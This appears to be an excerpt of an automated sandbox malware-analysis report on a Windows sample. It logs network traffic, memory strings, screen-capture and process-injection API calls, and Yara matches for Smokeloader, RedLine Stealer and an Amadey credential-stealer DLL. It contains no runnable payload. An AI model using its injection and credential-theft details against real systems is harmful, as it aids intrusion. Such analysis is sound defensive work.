                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.237.194
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 2.20.195.105
                              Source: unknownTCP traffic detected without corresponding DNS query: 2.20.195.105
                              Source: unknownTCP traffic detected without corresponding DNS query: 2.20.195.105
                              Source: unknownTCP traffic detected without corresponding DNS query: 8.238.85.254
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 8.238.88.254
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                              Source: unknownTCP traffic detected without corresponding DNS query: 8.238.88.254
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.228
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.rambler.ru (Rambler)
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.yahoo.com (Yahoo)
                              Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                              Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.98.131.207:443 -> 192.168.2.3:49723 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.190.159.19:443 -> 192.168.2.3:49728 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Source: Yara matchFile source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                              Source: Yara matchFile source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD2DA0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,
                              Source: 9545.exe, 0000000E.00000002.419598759.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                              System Summary

                              barindex
                              Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000B.00000002.456935359.00000000006C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000B.00000002.456463598.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000001A.00000000.423609338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000002B.00000002.603006628.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 0000002B.00000002.603522638.00000000004A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000000.00000002.354530381.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000000.00000002.354314042.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                              Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_0040D008
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00409C20
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_0040CAC4
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_0040F7FC
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_0040C580
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_0040D008
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00409C20
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_0040CAC4
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_0040F7FC
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_0040C580
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C120E0
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1C3DB
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2E32A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C12550
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C28509
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2C8AE
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1F960
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3090C
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C30A2C
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C24BEE
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF8C7D
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF9C60
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD77C0
                              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\explorer.exeSection loaded: webio.dll
                              Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
                              Source: kmxId0uLRn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000B.00000002.456935359.00000000006C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000B.00000002.456463598.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000001A.00000000.423609338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000002B.00000002.603006628.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 0000002B.00000002.603522638.00000000004A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000000.00000002.354530381.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000000.00000002.354314042.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                              Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: String function: 00C17D30 appears 49 times
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: String function: 00DE9420 appears 35 times
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: String function: 00DE76C0 appears 130 times
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401602 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401605 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401609 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401617 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015D4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015EA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015EE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00402693 NtOpenKey,NtEnumerateKey,NtEnumerateKey,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401602 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
